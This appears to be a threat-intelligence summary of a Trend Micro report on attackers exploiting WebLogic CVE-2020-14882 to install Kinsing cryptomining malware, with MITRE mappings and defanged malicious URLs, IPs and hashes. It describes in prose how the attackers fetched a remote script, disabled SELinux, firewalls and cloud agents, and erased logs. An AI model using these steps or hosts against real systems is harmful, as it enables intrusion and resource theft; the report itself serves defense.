Trend Micro analyzed post-exploitation activity abusing CVE-2020-14882 WebLogic vulnerability to deploy Kinsing cryptocurrency-mining malware. The report details how Trend Micro Vision One and Cloud One Workload Security detected, blocked, and traced the attack chain from initial exploitation to cryptocurrency mining. #CVE-2020-14882 #WebLogic #Kinsing
Keypoints
- Malicious actors weaponized CVE-2020-14882 WebLogic Remote Code Execution to gain footholds in target environments.
- Kinsing cryptocurrency-mining activity was delivered via a WebLogic exploit using a downloaded shell script and a multi-step chain.
- The shell script attempted to disable security features (SELinux, watchdog timers, iptables) and cloud service agents as part of the payload.
- The exploit involved reading wb.xml through a crafted request to trigger the shell download, followed by execution of wb.sh and subsequent Kinsing deployment.
- Trend Micro Cloud One Workload Security and Vision One provided detection across IPS, antimalware, web reputation, and activity monitoring, and offered execution profiling and threat-hunting support.
- Observed cleanup and anti-forensic steps included removing logs, modifying /etc/crontab attributes, creating a cronjob, and disabling security features (e.g., AppArmor) prior to deploying Kinsing.
- Vision One’s execution profile and threat-hunting queries helped analysts trace the attack steps across endpoints, servers, and cloud workloads.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – ‘remote unauthenticated attacker via sending a crafted HTTP request to the victim server resulting in RCE.’
- [T1059.004] Command and Scripting Interpreter: Unix Shell – ‘downloaded a shell script with the following contents’ and ‘the Java process attempting to open a bash shell.’
- [T1496] Resource Hijacking – ‘to deliver cryptocurrency-mining malware.’
- [T1070.002] Indicator Removal on Host: Clear Linux or Mac System Logs – ‘remove the /var/log/syslog file.’
- [T1222.002] File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification – ‘attribute modification of “/etc/crontab”.’
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – ‘disable Security-Enhanced Linux (SELinux), watchdog timers, and iptables, and disabling cloud service provider’s agents.’
- [T1070.004] Indicator Removal on Host: File Deletion – ‘delete the /var/log/syslog file’ (log removal).
- [T1053.003] Scheduled Task/Job: Cron – ‘cronjob to download the wb.sh script.’
- [T1562.008] Impair Defenses: Disable Cloud Logs – ‘disable cloud service provider’s agents.’
Indicators of Compromise
- [URLs] Context – hxxp://91[.]241[.]19[.]134/wb.sh, hxxp://185[.]14[.]30[.]35/kinsing, hxxp://185[.]14[.]30[.]35/wb.sh, hxxp://195[.]2[.]79[.]26/kinsing
- [SHA-256] context – 020c14b7bf5ff410ea12226f9ca070540bd46eff80cf20416871143464f7d546, 5D2530B809FD069F97B30A5938D471DD2145341B5793A70656AAD6045445CF6D
- [IP] addresses – 212.22.77.79, 185.234.247.8, 185.154.53.140